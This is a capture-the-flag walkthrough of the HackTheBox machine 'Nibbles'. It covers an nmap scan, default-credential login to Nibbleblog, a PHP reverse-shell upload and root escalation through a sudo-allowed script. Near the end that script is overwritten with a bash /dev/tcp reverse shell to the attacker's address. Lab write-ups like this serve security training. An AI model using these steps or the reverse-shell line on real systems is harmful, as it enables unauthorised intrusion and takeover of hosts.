Hello guys, welcome back with another walkthrough, this time we’ll be doing Nibbles a machine by HackTheBox rated easy. Without further ado, let’s begin.
Recon
Nmap Scan
As always we’ll start with a nmap scan to discover the open ports and services.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ cat nmap-scan
# Nmap 7.91 scan initiated Fri Oct 8 19:28:34 2021 as: nmap -sC -sV -v -oN nmap-scan 10.129.232.219
Increasing send delay for 10.129.232.219 from 0 to 5 due to 56 out of 185 dropped probes since last increase.
Nmap scan report for 10.129.232.219
Host is up (0.12s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 8 19:29:10 2021 -- 1 IP address (1 host up) scanned in 35.66 seconds
Two ports are open 22 and 80 running SSH and HTTP.
HTTP Enumeration
On the web site just there a message: ‘Hello World!’, but the interesting thing is a comment on the source code showing a directory /nibbleblog.
Seems this site is powered by Nibbleblog
And is vulnerable to an Arbitrary File Upload but for this we need credentials. The login page is on /admin.php, I tried ‘admin/admin’, ‘admin/password’ and ‘admin/machine’s name’ in this case is nibbles.
| User | Password |
|---|---|
| admin | nibbles |
Initial Foothold
We can find a reverse shell on /usr/share/webshells/php/php-reverse-.shell.php, let´s configure our php reverse shell changing the ip and our listener port, once it’s done just upload the file.
Start a netcat listener on port 443, and click on image.php to get a shell.
For a interactive shell run this commands:
1
2
3
4
5
6
$ python -c 'import pty; pty.spawn("/bin/bash")'
$ ^Z
$ stty raw -echo;fg
$ reset
$ export TERM=xterm
$ export SHELL=bash
In nibbler’s home directory there a zip file.
Privilage Escalation
When we unzip this file it create personal/stuff/monitor.sh script.
sudo -l show us that we can execute this script as the user root without password.
As we are the owners of this file we can insert a reverse shell into it.
1
2
3
$ echo '#!/bin/bash' > monitor.sh
$ echo 'bash -i >& /dev/tcp/10.10.14.39/443 0>&1' >> monitor.sh
$ sudo /home/nibbler/personal/stuff/monitor.sh
Just need a netcat listener on port 443 to get the shell.
Now we can read the flag. That’s it for now guys. Until next time.